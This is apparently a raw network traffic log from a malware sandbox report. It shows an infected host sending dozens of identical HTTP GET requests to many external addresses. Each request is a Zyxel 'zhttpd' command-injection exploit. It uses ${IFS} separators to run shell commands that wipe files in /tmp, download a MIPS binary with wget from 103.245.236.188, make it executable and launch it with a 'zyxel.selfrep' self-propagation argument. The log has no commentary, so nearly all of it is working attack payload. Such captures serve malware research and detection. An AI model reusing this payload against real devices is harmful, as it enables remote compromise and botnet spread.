                                                Jan 12, 2024 18:16:23.460819960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4442192.168.2.233694418.130.76.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460896969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4443192.168.2.234948895.55.130.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.460947037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4444192.168.2.2339044149.98.115.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461026907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4445192.168.2.233396893.115.75.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461095095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4446192.168.2.2359502149.84.111.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461141109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4447192.168.2.234952049.217.137.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461211920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4448192.168.2.2338796165.178.66.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461250067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4449192.168.2.235316836.103.63.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461304903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4450192.168.2.234945419.214.121.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461374044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4451192.168.2.2354282163.195.50.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461426020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4452192.168.2.233436275.143.144.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461476088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4453192.168.2.234689250.98.12.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461528063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4454192.168.2.2336834110.253.187.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461570024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4455192.168.2.2356578154.97.106.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461616039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4456192.168.2.235376414.198.109.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461683035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4457192.168.2.2357836200.190.101.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461731911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4458192.168.2.234702668.206.0.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461795092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4459192.168.2.235791297.205.119.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461853981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4460192.168.2.2342164177.35.28.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461904049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4461192.168.2.235583660.237.127.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.461939096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4462192.168.2.2359722174.190.146.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462013006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4463192.168.2.2349470179.1.166.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462070942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4464192.168.2.234029082.109.192.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462127924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4465192.168.2.2345462111.128.63.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462187052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4466192.168.2.23524624.236.173.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462224960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4467192.168.2.235912451.74.196.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462291002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4468192.168.2.2334774119.102.126.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462342978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4469192.168.2.233475839.70.44.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462404966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4470192.168.2.23392328.81.145.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462487936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4471192.168.2.235084670.47.147.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462537050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4472192.168.2.2344406141.16.215.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462599039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4473192.168.2.2345206107.181.112.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462670088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4474192.168.2.2349768161.185.88.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462726116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4475192.168.2.2339628118.100.139.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462793112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4476192.168.2.2347298171.207.237.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462851048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4477192.168.2.2351720176.26.66.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.462950945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4478192.168.2.2344546191.133.136.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463011026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4479192.168.2.2339690167.52.164.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463072062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4480192.168.2.2337290125.97.86.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463134050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4481192.168.2.2336936157.135.254.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463186026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4482192.168.2.235450481.202.18.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463253975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4483192.168.2.233510675.162.188.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463306904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4484192.168.2.2336230151.54.168.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463366985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4485192.168.2.235033643.40.20.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463413000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4486192.168.2.2335410132.38.98.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463470936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4487192.168.2.2346818133.170.129.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463550091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4488192.168.2.233418465.53.174.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463581085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4489192.168.2.233744034.227.52.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463627100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4490192.168.2.235487212.113.249.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463682890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4491192.168.2.2340236165.226.189.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463740110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4492192.168.2.235007252.169.207.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463807106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4493192.168.2.23406282.69.245.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463856936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4494192.168.2.233392076.8.40.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463912010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4495192.168.2.235725690.153.160.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.463983059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4496192.168.2.2340616217.76.220.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464035034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4497192.168.2.2336798200.15.158.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464086056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4498192.168.2.233783268.67.77.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464149952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4499192.168.2.235469259.94.115.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464219093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4500192.168.2.2344304155.158.218.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464270115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4501192.168.2.2346790211.201.176.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464317083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4502192.168.2.235234491.242.61.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464380026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4503192.168.2.234344678.214.167.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:23.464459896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4504192.168.2.2345418158.45.66.245443
                                                TimestampBytes transferredDirectionData
